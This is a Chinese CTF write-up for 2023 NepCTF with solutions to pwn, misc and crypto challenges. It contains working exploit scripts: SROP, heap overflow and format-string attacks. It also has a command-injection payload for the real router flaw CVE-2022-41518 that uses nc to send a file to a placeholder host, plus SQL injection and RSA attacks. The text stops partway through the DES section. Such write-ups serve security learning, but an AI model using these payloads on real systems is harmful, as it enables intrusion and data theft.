[2023NepCTF] Csome Writeup

前言

纪念一下，打的很爽Pwn抢了4道一血，可惜最后3分钟第一被超了

Pwn

srop

Srop一把梭，这里要注意，跳转是PLT表的syscall函数和真实的系统调用不一样，在函数内会将rdi赋值给rax，后面的参数寄存器都要后移一位

from pwn import *

context.arch = "amd64"
context.log_level = 'debug'
# io = process("./pwn")
io = remote("nepctf.1cepeak.cn", 31943)

mov_eax_15 = 0x0000400754
buf = 0x00000601050
ret = 0x004007AE
syscall = 0x0004005B0
pop_rdi = 0x0000000000400813
stack = 0x0601a50

frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = 0
frame.rdx = stack-0x8
frame.rcx = 0x1000
frame.rip = syscall
frame.rsp = stack

payload = b"a" * (0x0030+8) + flat([
    pop_rdi,
    15,
    syscall
]) + bytes(frame)


io.send(payload)
sleep(0.5)

frame = SigreturnFrame()
frame.rdi = 2
frame.rsi = stack-0x8
frame.rdx = 0
frame.rcx = 0x1000
frame.rip = syscall
frame.rsp = stack + 0x110
payload = b"./flag\x00\x00" + flat([
    pop_rdi,
    15,
    syscall 
]) + bytes(frame) 

frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = 3
frame.rdx = stack-0x100
frame.rcx = 0x40
frame.rip = syscall
frame.rsp = stack + 0x110 + 0x110
payload += flat([
    pop_rdi,
    15,
    syscall 
]) + bytes(frame) 

frame = SigreturnFrame()
frame.rdi = 1
frame.rsi = 1
frame.rdx = stack-0x100
frame.rcx = 0x40
frame.rip = syscall
frame.rsp = stack + 0x110 + 0x110 + 0x110
payload += flat([
    pop_rdi,
    15,
    syscall 
]) + bytes(frame) 

log.success(f"length {len(payload):#x}")
io.send(payload)

io.interactive()

HRPVM2.0

核心思想是替换文件，这里重写了kernel文件，之后python再次调用程序就可以执行了shell了

命令顺序如下，这里不能输入#，但是shell脚本使用Popen需要有shabang开头，但是shabang并不被sh执行，但输入又不能输入回车，所以这里可以采用env -S绕过

mkdir app/templates
cd app/templates
echo #!/usr/bin/env -S python3 -c "import os; os.system('cat flag')">kernel
mount kernel

但是mount会需要权限校验，这里需要利用溢出漏洞，off by “two”，也就是爆破1/16，踩中一个权限偏移内不为0的有效的堆地址，就可以绕过权限校验

exp

from pwn import *
import requests
req = requests.session()

url = "http://nepctf.1cepeak.cn:30424"
req.get(url)

context.log_level = 'debug'
# io = process("./kernel")
io = tube()
def io_recv_raw(*a):
    r = req.get(url + "/receive")
    print(r.json())
    return r.json().get('output', "").encode("utf-8")
def io_send_raw(x):
    r = req.post(url + "/send", data={"input": x})
    
io.recv_raw = io_recv_raw
io.send_raw = io_send_raw
# tob = lambda x: x.encode("utf-8")

def rm(file):
    io.sendafter(b"$", b"rm %b" % (file,))

def cat(file):
    io.sendafter(b"$", b"cat %b" % (file,))

def init(content):
    io.sendafter("Make a wish to Nepnep", content)

def echo(file, content):
    io.sendafter(b"$", b"echo %b>%b" % (content, file))

def mkdir(name):
    io.sendafter(b"$", b"mkdir %b" % (name,))

def cd(name):
    io.sendafter(b"$", b"cd %b" % (name,))

def exec(name):
    io.sendafter(b"$", b"exec %b" % (name,))

def id():
    io.sendafter(b"$", b"id")

def mount(name):
    io.sendafter(b"$", b"mount %b" % (name,))

def leave():
    io.sendafter(b"$", b"exit")

for i in range(32, 127):
    log.success(f">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>{i}<<<<<<<<<<<<<<<<<<<<<<<<<")
    leave()
    req.get(url)
    sleep(0.5)
    payload = b""
    init(payload + b";" * (104 - len(payload)))
    mkdir(b"app/templates")
    cd(b"app/templates")
    echo(b"kernel", b"""#!/usr/bin/env -S python3 -c "import os; os.system('cat flag')" """)

    echo(b"data", b"a"*(0x100-2) + b"bc" + b"\x21\x42")
    cat(b"kernel")
    echo(b"step1", b"mov rdi,data; syscall 0;")
    echo(b"step2", b"mov rdi,data; mov rdx,258; syscall 1;")
    exec(b"step1")
    exec(b"step2")

    mount(b"kernel")
#  59  52 65 0f 37  56 
# 7c  12 3c 44 45  56
io.interactive()

Nep router

https://gitee.com/baozhazhizi/IoT-vulhub/tree/master/Totolink/CVE-2022-41518

CVE-2022-41518一把梭，这里用反弹shell得到flag

import contextlib
import requests
import os

session = requests.Session()
login_url = "http://106.75.63.100:34903/formLoginAuth.htm?authCode=1&userName=admin&goURL=home.html&action=login"
raw = session.get(login_url, timeout=5)

inject_url = "http://106.75.63.100:34903/cgi-bin/cstecgi.cgi"
inject_data = {
    "proto":"8",
    "hostname":"';" + """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/cat /flag/flag  |nc xxx.xxx.xxx.xxx 1234 >/tmp/f""" + ";'",
    "topicurl":"setOpModeCfg"
}

with contextlib.suppress(Exception):
    resp = session.post(inject_url, json = inject_data, timeout=1)
print("shell!? ---------------> ")

login

首先是路径穿越，由于不会校验目录，可以直接访问文件，下载文件，最后可以下载得到login ELF文件以及libc库，之后逆向很快能看到sprintf格式化字符串漏洞，最难就是本地调试找堆指针

exp

import struct
import time

import requests
from pwn import *
import logging


def creat_logger(log_path, logging_name, suf_name):
    if not os.path.exists(log_path):
        os.makedirs(log_path)
    log_full_path = log_path + logging_name + suf_name
    logger = logging.getLogger(logging_name)
    logger.setLevel(level=logging.DEBUG)
    handler = logging.FileHandler(log_full_path, encoding='UTF-8', mode='w')
    handler.setLevel(logging.INFO)
    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    handler.setFormatter(formatter)
    console = logging.StreamHandler()
    console.setLevel(logging.DEBUG)
    logger.addHandler(handler)
    logger.addHandler(console)
    return logger


logger = creat_logger("./", "log", ".txt")
req = requests.session()
start = b"deadbeaf"
end = b"asdewedv"
url = "http://106.75.63.100:34617"
# url = "http://172.20.192.1:8080"


def read_s(offset):
    if offset < 0:
        offset += 2 ** 32
    while True:
        try:
            r = req.get(url + "/login", params={
                "user": f"{start.decode()}%{offset}$s{end.decode()}",
                "password": "aaaa"
            }, timeout=1)
            break
        except ConnectionResetError as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
        except TimeoutError as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
        except requests.exceptions.ConnectTimeout as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
    s = r.content
    # print(s)
    code = s[s.find(start) + len(start):s.find(end)]
    return code, hex(struct.unpack("<Q", code[:8].ljust(8, b"\00"))[0])


def get_p(offset):
    if offset < 0:
        offset += 2 ** 32
    while True:
        try:
            r = req.get(url + "/login", params={
                "user": f"{start.decode()}%{offset}$p{end.decode()}",
                "password": "aaaa"
            }, timeout=1)
            break
        except ConnectionResetError as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
        except TimeoutError as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
        except requests.exceptions.ConnectTimeout as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
    s = r.content
    code = s[s.find(start) + len(start):s.find(end)]
    return code


def write(offset, x):
    if offset < 0:
        offset += 2 ** 32
    while True:
        try:
            r = req.get(url + "/login", params={
                "user": f"%1000${x}c%{offset}$hhn",
                "password": "aaaa"
            }, timeout=1)
            break
        except ConnectionResetError as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
        except TimeoutError as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass
        except requests.exceptions.ConnectTimeout as e:
            print("retrying...", e)
            time.sleep(0.5)
            pass


# p = 15196
# write(p, 0x58)
# print(f"[+] {get_p(p)} => {read_s(p)}")
# p2 = 15513
def write_s(sx):
    s = struct.pack("<Q", sx).strip(b"\x00")
    print(s)
    for i in range(len(s)):
        p = 15196
        write(p, 0x78 + i)
        # print(f"[+] {get_p(p)} => {read_s(p)}")
        p2 = 15511
        write(p2, s[i])
        # print(f"[+] {get_p(p2)} => {read_s(p2)}")
        p3 = 15518
        print(f"[+] {get_p(p3)}")


# print(f"[+] {get_p(15712)}")
# # xt = int(get_p(15712).decode(), 16)
# # print(f"[+] {xt:#x}")
# print(f"[+] {get_p(15512)}")
# print(f"[+] {get_p(16110)}")
# # print(f"[+] {get_p(15712)} => {read_s(15712)}")
# for i in range(1, 0x31, 8):
# x = xt + i
# print(f"[+] {x:#x}")
heap_base = int(get_p(15059).decode(), 16)
print(f"[->] {heap_base:#x}")
xt = heap_base- 0x40
print(f"[->] {xt:#x}")
write_s(xt)
print(f"[+] done")
print(read_s(15518))

# write_s(0xdeadbeafdeadbeaf)
# p = 15196
# print(f"[+] {get_p(p)} => {read_s(p)}")
# p = 15513
# print(f"[+] {get_p(p)} => {read_s(p)}")
# p = 15516
# print(f"[+] {get_p(p)}")
# for i in range(0x3d5b-10, 0x3d5b+100):
#     code = get_p(i)
#     if code.startswith(b"0x55") or code.startswith(b"0x7f") and len(code):
#         content = read_s(i)
#         # print(f"[+] {i} => {code} => {content}")
#         logger.warning(f"[+] {i} => {code} => {content}")
#         continue
#     # print(f"[+] {i} => {code}")
#     logger.info(f"[+] {i} => {code}")

HRP-CHAT

这一套题都是源码审计的题目，漏洞也很简单

1

SQL注入，注意这里不能用万能密码1’ or 1=1—因为在client中scanf不支持空格，所以就要先在数据库中注册一个用户名为1的用户，然后再次注册一个用户名为1'--

2

首先分析源码（其实也不用chat的sever，只要看client的处理逻辑即可）可以看到这里Bot模式只会返回一个字符串'远程AI协助服务正在开发中!'，但是我们需要服务器返回RemoteVIPApplicationCertificationHasPassed这一串才能获得flag，那么我们就需要伪造服务器返回的message。我们可以看Chat模式下的服务器的原理，服务器就是转发消息进行广播。那么我们就可以想到

如果让一台机器在Bot模式下，另一台机器在Chat模式下

那么我们就可以利用广播的机制，伪造服务器返回message，这里也没有做任何校验，所以就能得到flag

3

3号题目我看不太出来有啥漏洞，感觉就是正常的逻辑，抽卡获取角色，用message查看当前角色池子和技能，抽到H3h3QAQ就可以了，释放第二个技能log4j，就能打死ThTsOd了

4

这个比较玄学，在我打2号flag的时候，可能是2号flag需要卡一个时机，我就写了脚本爆破，可能请求太多了，服务器就崩溃了，进入Safe box的cmd界面，输入Safe_Mode_Key就可以获得flag

Misc

codes

pwn的思路打，先泄露libc，找到偏移直接system(“env”)一把梭

#include <string.h>
int main(){
printf("1234");
  size_t tmp = &printf;
tmp -= 0x61c90;
tmp += 0x52290;
((int (*)(const char *, ...))tmp)("en" "v");
 } 

与AI共舞的哈夫曼

确实不用自己写代码，GPT一把梭

def decompress(input_file, output_file):
    with open(input_file, 'rb') as f:
        # Read frequency information
        num_freq = ord(f.read(1))
        frequencies = {}
        for _ in range(num_freq):
            byte, freq = f.read(1)[0], 0
            for _ in range(4):
                freq = (freq << 8) | f.read(1)[0]
            frequencies[byte] = freq

        # Rebuild Huffman tree
        root = build_huffman_tree(frequencies)

        # Decode compressed data
        with open(output_file, 'wb') as out_f:
            node = root
            while True:
                bit = f.read(1)
                if not bit:
                    break
                bit = int.from_bytes(bit, byteorder='big')
                for i in range(7, -1, -1):
                    if (bit >> i) & 1:
                        node = node.right
                    else:
                        node = node.left
                    if node.char is not None:
                        out_f.write(bytes([node.char]))
                        node = root

ConnectedFive

万宁五子棋，注意下棋到同一个位置会死机所以要，写逻辑爆破，为了提高胜率，这里采用最朴素的策略，计算每一个空白位置自己的棋子的密度，来判断哪些位置更优

exp

import random

from pwn import *

context.log_level = 'debug'
context.timeout = 3
getIO = lambda: remote("nepctf.1cepeak.cn", 30582)
io = getIO()

def getinfo():
    io.recvuntil(b"MESSAGE computer: ")
    io.recvuntil(b"\n")
    io.recvuntil(b"\n")
    io.recvuntil(b"\n")
    scoreboard = io.recvuntil(b"\n", drop=True).decode()
    # print(f"[+] Scoreboard {scoreboard}")

    # io.recvuntil(b"\t   a b c d e f g h i j k l m n o\n")
    checkerboard = []
    raw = io.recvuntil(b"\t   a b c d e f g h i j k l m n o\n").decode()
    for i in range(15):
        # io.recvuntil(b"\t" + bytearray([i+ord('a')]))
        r = io.recvuntil(b"\n").decode()
        raw += r
        a = r.strip()
        checkerboard.append(a[3::2])
    # print(checkerboard)
    return scoreboard, checkerboard, raw


key = "abcdefghijklmno"

def check_pos(x, y, checkerboard: []):
    res = 0
    cnt = 0
    for i in range(max(0, x-4), min(14, x+4)+1):
        cnt += checkerboard[i][y] == 'X'
    res = max(res, cnt)

    cnt = 0
    for i in range(max(0, y - 4), min(14, y + 4)+1):
        cnt += checkerboard[x][i] == 'X'
    res = max(res, cnt)

    cnt = 0
    for i in range(-4, 4+1):
        if 0 <= x + i <= 14 and 0 <= y + i <= 14:
            cnt += checkerboard[x+i][y+i] == 'X'
    res = max(res, cnt)

    cnt = 0
    for i in range(-4, 4+1):
        if 0 <= x - i <= 14 and 0 <= y + i <= 14:
            cnt += checkerboard[x-i][y+i] == 'X'
    res = max(res, cnt)

    return res

def get_nice_pos(checkerboard):
    p = []
    for i in range(15):
        for j in range(15):
            if checkerboard[i][j] not in ".+":
                continue
            p.append((check_pos(i, j, checkerboard), i, j))
    p.sort(reverse=True)
    return p[0][1:]



def action(checkerboard: []):
    print(len(checkerboard), end=" ")
    for x in checkerboard:
        print(len(x), end=" ")
    print()
    while True:
        # x = random.randint(0, 14)
        # y = random.randint(0, 14)
        # print(x, y)
        x, y = get_nice_pos(checkerboard)
        if checkerboard[x][y] in ['.', '+']:
            return key[y] + key[x]


for i in range(100):
    try:
        s, c, r = getinfo()
        log.success(f"Scoreboard {s}")
        log.success(f"Checkerboard \n{r}")
        ans = action(c)
        io.sendline(ans.encode())
    except EOFError:
        io.close()
        io = getIO()

io.interactive()

CheckIn

b站发不出去，等了一会儿，flag直接在题目描述了

陌生的语言

https://ay.medyotan.ga/upload/lwa_moonrunes.png

直接出

NEPNEP_A_BELIEVING_HEART_IS_YOUR_MAGIC

小叮弹钢琴

莫斯编码得到YOUSHOULDUSETHISTOXORSOMETHING，字面意思，你需要用这个xor，还有一段直接mid看

x = 0x370a05303c290e045005031c2b1858473a5f052117032c39230f005d1e17
xx = x.to_bytes(x.bit_length() // 8 + 1, "big")
key = b"YOUSHOULDUSETHISTOXORSOMETHING"
print(xx)
print(len(key), len(xx))
print((bytearray(map(lambda x: x[0] ^ x[1] ^ 32, zip(xx, key)))))

大小写转换异或32

你也喜欢三月七么

首先是用群名字sha256得到dd8e671df3882c5be6423cd030bd7cb69671ef27dfe7a541903edc4e23168009取前面的16个字节

得到https://img1.imgtp.com/2023/07/24/yOkXWSJT.png

一眼星穹铁道的文字

翻译可得

HRP_aIways_likes_March_7th这里的aIways的I是大写的i

lic

磁带信息，先用audiotap转磁带文件，再用010打开

可以看到文字的NepCTF形状，利用脚本反转之后可以看到

with open("attachment.tap", "rb") as f:
    data = f.read()[50:].strip(b"\xa0")
data = b"aaa" + data
chunk = 16
for i in range(0, len(data), chunk):
    # print()
    x = data[i:i+chunk][::-1].decode(errors="ignore")
    print("".join(map(lambda _: "  " if _ == '>' else _ + ' ', x)))

Crypto

random_RSA

winner’s攻击，这里用了低指数解密算法的脚本https://github.com/pablocelayes/rsa-wiener-attack，恢复d

因为phi(n^2)近似(q^2-1)(p^2-1)，先用命令交互出一组数据，之后使用下面脚本爆破

得到d之后

因为$ed-1=k(p^2-1)(q^2-1)=k(p^2q^2-p^2-q^2+1)=k(n^2-p^2-q^2+1)$

所以可以利用$(ed-1+n^2)/n$得到k

之后一把梭求p，q即可

import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator
from gmpy2 import gcd, iroot

def hack_RSA(e, n):
    '''
    Finds d knowing (e,n)
    applying the Wiener continued fraction attack
    '''
    frac = ContinuedFractions.rational_to_contfrac(e, n)
    convergents = ContinuedFractions.convergents_from_contfrac(frac)

    for (k, d) in convergents:

        # check if d is actually the key
        if k != 0 and (e * d - 1) % k == 0:
            phi = (e * d - 1) // k
            s = n - phi + 1
            # check if the equation x^2 - s*x + n = 0
            # has integer roots
            discr = s * s - 4 * n
            if (discr >= 0):
                t = Arithmetic.is_perfect_square(discr)
                if t != -1 and (s + t) % 2 == 0:
                    print("Hacked!")
                    return d


def attack(n, e):
    d = hack_RSA(e, n * n)
    k = (e * d - 1 + n * n) // (n * n)
    tmp = (n * n) - ((e * d - 1) // k) + 1 + 2 * n
    ppq = int(iroot(tmp, 2)[0])
    tmp = (n * n) - ((e * d - 1) // k) + 1 - 2 * n
    pmq = int(iroot(tmp, 2)[0])
    p = int(gcd(ppq + pmq, n))
    q = n // p
    assert p * q == n
    assert e*d % ((p-1) * (q-1)) == 1
    return p, q, d


ss = """
9664150901450480967690564598017074925278657678428083526647019231493500227501186171121223353625264405549895808023865076405682104148869646937802710197692149880801739296224423720449697986562014962810427149274953670336431969720847239367252577312181797620406921597928891203908280967606801144879943997948288687269135451721341591758893489869339520600383114702594831680556978281938914417626897063741811649257614797234325708166759403120480173752153249168733044607204951768557734895758143808863754965572034240739588491294098941537522398891830128387438317592253663045532862058982832135946842401711673333170801808131328328138409
22983334574580917801180860838975915911056113991786778412831201182411314364399816331219602816987801515703576764159087708450625423803558017646160341422267439951044407124414015864769966876129437519084492109510818093789724685834745254039500061544494687297354628168281982577957457924120597256869151402144742486005161738151255767127578010682514603747674732192539709537275806788688798050708598638377916842971631011263261195175705071683872373603843884113967910301479453532836470974019712063094982740534667039293541440015250164631599817949388195744930270131276498157477215483242544464596689268807389029069272532067490083369547669715239977992410158704220313287358936476570197236442784273557421888378497464433353892887766426339418782876390919046890278793088868131975197880580905027785352428189007480894687391277338836087221071379217489414415183919425962364501612704379275059469144794211736312560265881110693864711202763941138206607689382712402597791806706502788925221170513306681258576676019323627743632448114452443097397014141839634039981951855535241851424638689366379545342739319677785567174640217613527540438283508170772807801142587539976048845517400474132948151081974542377578704999265763979523387588936804746887912462709543565738342209411
26421545185254987799905424190746332339125127121314171591428976353667115363763727486775614091903284658438097216623238914712478521157241139537987344330841699472419239411492271130318030306609434654284036687937944162679104946235126178521045633190386482424340322162024092955319660759058652161996411895209248718547013152501979160191126988501306653660575206430331327547695958573346502447806907651886805983227927733506487689107733064048662109346548423844168211328529388196436068858018422470472568131170937800147226367812703244919615304030171460050297573510835520868630853149705239212069246257510861666696541821151818169796199
647587495710510972114742400831708548154715412535242193260921609695347930936707036639358968164012520349909437957090794941485190580257732521977171932341037504324231632999867734166481147062308183081010136684146530539354916263125020063213571051436518584206830118093755508481812082245822690944819197599760354341006609736609770789666793064642703641481389320623277678173558301629672865116377269127942025612180794827944539599815847863105760862109828389140681525680276554276533927094628602058843675286071339454429465986971694907927688830239142611855187274379851523189108755859657533224271693320278278605425423386495384174568562497627761612422045791957059437741493328698509481368554006456683812993984891378698935039540883929464645807942966456158605263661813471703445078327854656000079848297587266423318192874967873522951070558487797128927313745909508734015212545363132719971877683921675395438436594169300084386617636244174085949981341272801441913192529055922603538974179887610571219493524648953191928761783132985310317276631200614903232826609021472846793881344295699985919781942936761500592413666531213913327520376681809371295266029776133655277736129022073066033964950152867511761886746401418419578828754174047939112010456150675463575657509189
10802012890829459540541628896792295078778436077857489427389981093725666739897304883046269390863878441152550000748160396908161524179907858077000487740264046477305439871796448601143325277932003810352123707096051383675738121180861345577006541031517155258339948241289482502904363911440323113072882087374540321696726636204227138558487828152291517517119224906926633391353300941778394425937626996455545868331674490267329118395561623628314372766364381142098697604044336132503664081692651614933878766623288150407771680698950374395680226687162951709227319486379639675961227436372862323642542582705252736363789548988448924281523
83164181286675647518830286473660936842056768837605965773754722828164869255002601931877175384944967168423206258868966986144360226269117391889938003716473472419177908278255032274351977454805821764218411534787094767284216135276174354406996436906142025032430967949150772284199385705263345050808935420677789360168112630311736817620156906081165474809562107538852267394278439066621108665747312736533966159229107173152465365414052064089548384023025856375904149686916115214912086305308341266693329116385815754412736749978601321323191864143850174315828039788320203726197797788026323483995092501876361540056171546433345056509023822723392649116651071369395319931930221212866085340561430347693225966408351502938942294604586300299982831155358938495260400185484497256896416324370391657125309375755376057180940858375964786733652546488880996426657064631708252560023474877949301792612429382653730100520713338044964401333750090947037843448152614531864695601400078878276612572266304350518364495335341275038759497131064447619421326513680343303115330200681996349441238490209605256140282866353360785265474868465131016931425931964393177163140173169398499291572984733338118081910704432753107524477347843354958141041369207588577081612844623302487399941453933
7896711153350680182046433804310163873530744638818895739714243668607588547792890005637528789452971314751693622472528149754510450552025972279187841776097749142749323304216218612718765727398943401294644022496938258864873262044174164494124912426175372524656376121897875690251938452930789747994519674300862595216275541928658146402252536829579922303097776404657455395450853161185534506599329499328761065707811197966475148318482438088816924842458585192796056395380885795831624193355572079389648572361687920747403086875781493091238221420792111039898275872964722825166960441004965842026859265796562573640732063541877035703999
2453336941794377920668315851654619953646928905461467141099094168657719206064766651951427088886039685796776114141822989089619723777926424614857001633051068225552956142083890497598873667557028446871021184458240143729566494812770661669240646268836255291274950055880283884837660674102748619167688728015214974199172102739298082411466099956770246119223362727103493898761907722553589378295675272645561934551025890703140999463094569248990423646872411723328409457823533926161366175638210485154684713670484074111551184519212764546709551586814178654768531770178427218348159524090067132668379834207556749709109588553767744958928030458642933207972731738889836640270310522407082557073074220327314630716521374036182110178874650024321686921170512401592772523798249960102467660742850794643617416339049505280450162445401270432730440216281390479357051798091526529334107226924555476475287445348397336720445992548926807772402601594999910439716972523884323110378738095230641354005535939595738498325951885080299526970515488294162554370726438356887387936240973624985584430961461016270437469408900537013699409622145224578929157293051142754994365105441300293953769949427089080402762107252481674439414260001163630002002209227608718701864539764471854120765149
934357599818997062963713308304362991596280828009512110755774617078887165360994483469754259794232045134748049571365890970600399733065188159532911208357285158307632045436603686477662110964558434302467120269827088523605436776745307435600233303494688594128265424710248665574421617599397235608386293736009112635240116363197127688715563025691804376760043956191129689115106451454594303458289356459242344139405236999049625726629507017505219076937886664753583057499783039263793580691707653961619033353122066993401993412281067305045569711817510917816670267012976388544311131447428560310255424118434372129058504068971704509583
452535985385426610533595291636837260029529161119012527028832154063118066054114365212225611604413376466306821291622206453481076548722964431496720642815073434660316751461773927736769380260565572635521865666418131804097223787559572584034429232767907408588386908627811135292858626656533240022150603513420578118687227948584091074426900135895322629439907454314781910440178440833975308243442451505929901732597325250942477885257392248372956797459556418043140426549205059992693832494817312609114820874540542115879517751481239945773745036685837555782445189562031306229705420041083026014508308653365829010341657395972738383225136782775802242507679530114388408690163501378818581259836086658314750295168292063413234606975054845567353768299988855117672810051088400466976103022087953981820980574159918396071750775318139479271235473733328684536087473478158695154228827351532739332906517313798270187902326156179644850383883874005798210565002897279183014905697229418005561458301283927876097634598729273370887688127716799146589959547718296529504218197024144569252951455907047844555593109642331128337551457131825334129476995668564725114284200611621984522440766436051246003019078387721989410126014046300337526406832227661211670511374666171933242207761
21636726262954983891798049753528884949149278107055957653804164122232750629108771687361858365462276461758050089339414649308189481865701469685971089624677686415038790141344992019067961279901006021154460525723482009962909666812029094177916225260557575750852951983028595026985975759287231315896982867941386247369741207715929550901277459410981688464120324580668604126829385737148142010733680106833740158713528050751799693988082141485112234559239865511692418065113774817308071898684749289577274638116406277808547134140659187860357703459236546455683700089064295899984063024669612762793525503212165546539776762359198804880143
121831222096537368999356089708412896046021123796479990498164844552933248218587707868671273702871780046383065460423688141024214392817157791234305056319786064285936708392236448824783787802429682770337272235088202671105152535710294695902974253047704609221448981405609532633533062373004757059178427305919782441807444728003944125735197038228206500793881947731683045961796477046714111614358449413877923492947221540637411996522154279667079850899812790025430709528400798251289702825878302828745393493824877531623611021252456356175891394204733580270256164603165280954431866062942260146653644302782243197898971847034949620717936360716813922698249012591248773536863924987646374098897933678199676635398286431303649466386258192966901198806753276444091301228010214339088108290023638595922653691209504127688631013840850339138278703745938757018854197798962009892613282181507128330931048662067002367216863617848322567299023690624245593206164105677495564960539642415302357595708814138558968835481632687790665010565719903412940128287504825368916534220790908431745824689253975485426199665419413293026825301727942248672409218671101407001619695622271079059718159320809385046289813332457898242478875287662049306326128127096487004090260965504341859573161979
5970296459863639263155783075172703907538560676961520474432385024839627916414414908656192009767702560571700661568202705725697718102111106038786955170270219508803648130754658135536335026559679753140733217830203813331793926165711104662514382832955840370630723176415927796955765169553517462286240424922177248496576208476937262840173500549507825256850681559103373575719799534073745792805709350898345377043444572387322205792026096379146084848266043619559701164699491546970266459037417312873294970955821603622312389603295515738649074112877256884131342394799593566008925579319817453597162465762851343362551362340193519234111
18976399709138358912615581289803736063685392526627126047585536571255137591890898469016131796862155245718632726865355864471577906314641282253655270136097246496157189183315479252842675388863506996293537386049856520375327248649829502157752917745660189131281987348802723603782945921331000190785525591621756168923822951821404353646825235167866284344617268886872941218738132870839917479807740404673373159559070563008075098345562213387428585134527952927397372161736924000067060148836364979179350873731455181407191524960955000331041112836325967730682314802564504793245212062165765383998948417925582958872582993455246869810367559513521188245827564742949660925007994864642588404989913088438650029238240908588039032304578884090105469536379896758734713314973495243747985470691862911913134723349279860545443973275726615548263752591810660223834517909123784767147753948727361870320431446223866316111276171603492135128216357176021812643706643763587976997347084988208779018873039456862231395447809853586521609100405013300467752808797446255256509955396709060833818059140619116092459497493686455825427088609805918612964163855925495410440760559642006382819680630706627333218589739634830096224810601690036163130895447446190737732854075739908518171940791
""".strip().split()
arr = list(map(int, ss))
xx = []
for x in range(7):
    n = arr[2*x]
    e = arr[2*x + 1]
    xx.append(attack(n, e))
print(xx)
#
global_bits = 1024

from extend_mt19937_predictor import ExtendMT19937Predictor

for p, q, d in xx:
    print(hex(p & 0xffffffff), hex(q & 0xffffffff), hex(d & 0xffffffff))
    print(p.bit_length(), q.bit_length(), d.bit_length())

print(len(xx))
for xt in range(2 ** 7):
    try:
        predictor = ExtendMT19937Predictor()
        for i in range(7):
            if xt & (1 << i):
                predictor.setrandbits(xx[i][0] >> 32, global_bits - 32)
                predictor.setrandbits(xx[i][1] >> 32, global_bits - 32)
            else:
                predictor.setrandbits(xx[i][1] >> 32, global_bits - 32)
                predictor.setrandbits(xx[i][0] >> 32, global_bits - 32)
            predictor.setrandbits(xx[i][2] >> 32, global_bits - 32 - 32)
        # d = predictor.predict_getrandbits(global_bits - 32)
        # print(d)
        break
    except ValueError:
        print(xt)
        del predictor

from gmpy2 import next_prime, invert as inverse_mod
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from random import getrandbits
from math import lcm
from sys import exit
def generate_prime(bits: int):
    p = (predictor.predict_getrandbits(bits - 32) << 32)
    return next_prime(p)


def generate_private_key(bits: int):
    q, p = generate_prime(bits), generate_prime(bits)
    n, phi = p * q, lcm(p-1, q-1)
    print(p.bit_length(), q.bit_length())
    print(hex(p & 0xffffffff), hex(q & 0xffffffff))
    d = inverse_mod(0x10001, phi)
    privateKey = RSA.construct((int(n), int(0x10001), int(d), int(p), int(q)))
    return privateKey, p > q


privateKey, signal = generate_private_key(global_bits)
Cipher = PKCS1_v1_5.new(privateKey)
cc = b"\x02\x81\xbe\x9e^\xdc2\xf6V~\x98 \x97\x125\xa2-\xe3gal\x96\x02\xba\xe8\xaaN*\xce\xe98\x8eAhSNz\x08;Vb\xe0\x9d\xe2\x15\xf6\x12\xd6\xe5'a\xc0\rt\r+\xa4_\xaa\x19\xc4\x97>\xa1\r\x14\x18\xfe\xd4\xa8~d\xfe\x9d\x95>\x0f\x84\xfa/p\xfa\x91\x070\xd1\xa64\xb2N\x9a\xe9\x01\xe9\x91\xa58\x81\xb2\\H&B\xcc\xde\xe8|\x87\xed\x0e)\xd3\xde\x93f\xa5\x0e\xecv\x9c\xcea%\x85\x9e\xb8\x10\x9ea\xdfnME\x18i\xab,\x96{\xab\xf3i\xa9I\xc2\xbb\xac\x81\x12\x04\xf4J8N\xfbE\x0fp.P\x9b\xacrX\xc1Hk\xff->\x9b\xd99\xd2L\xc2\x849*\xfa\xf3>\x8c&23\xceu\xb7\xf7\xa2\x81\x15\xacOX}\xd3t\xa6T\x1b7\xa9\xf6\x163\x96\xa1\xe1\xd7\xb3e\xccB\x9a\xee\x83B|\x92E>C\xfb\xd5\xc5\xe3#\xa514\xa0\x1b\x03\xbf\xf6\xb3\x1bK\xa2=\xaf3\x03w\x91\xdeU\xb51Y}%\x89\x00"
print(Cipher.decrypt(cc, None))

simple_des

爆破9位恢复L，之后逆推下面这个操作即可恢复L，R的初始，由于LR来自key其中的56位，所以只要知道key的56个bit即可

for i in range(16):
    for j in range(ROTATIONS[i]):
        L.append(L.pop(0))
        R.append(R.pop(0))

exp

from operator import add
from typing import List
from functools import reduce
from gmpy2 import *
from Crypto.Util.number import *

_IP = [57, 49, 41, 33, 25, 17, 9, 1,
       59, 51, 43, 35, 27, 19, 11, 3,
       61, 53, 45, 37, 29, 21, 13, 5,
       63, 55, 47, 39, 31, 23, 15, 7,
       56, 48, 40, 32, 24, 16, 8, 0,
       58, 50, 42, 34, 26, 18, 10, 2,
       60, 52, 44, 36, 28, 20, 12, 4,
       62, 54, 46, 38, 30, 22, 14, 6
       ]


def IP(plain: List[int]) -> List[int]:
    return [plain[x] for x in _IP]


__pc1 = [56, 48, 40, 32, 24, 16, 8,
         0, 57, 49, 41, 33, 25, 17,
         9, 1, 58, 50, 42, 34, 26,
         18, 10, 2, 59, 51, 43, 35,
         62, 54, 46, 38, 30, 22, 14,
         6, 61, 53, 45, 37, 29, 21,
         13, 5, 60, 52, 44, 36, 28,
         20, 12, 4, 27, 19, 11, 3
         ]

__pc2 = [
    13, 16, 10, 23, 0, 4,
    2, 27, 14, 5, 20, 9,
    22, 18, 11, 3, 25, 7,
    15, 6, 26, 19, 12, 1,
    40, 51, 30, 36, 46, 54,
    29, 39, 50, 44, 32, 47,
    43, 48, 38, 55, 33, 52,
    45, 41, 49, 35, 28, 31
]
ROTATIONS = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]


def PC_1(key: List[int]) -> List[int]:
    return [key[x] for x in __pc1]


def PC_2(key: List[int]) -> List[int]:
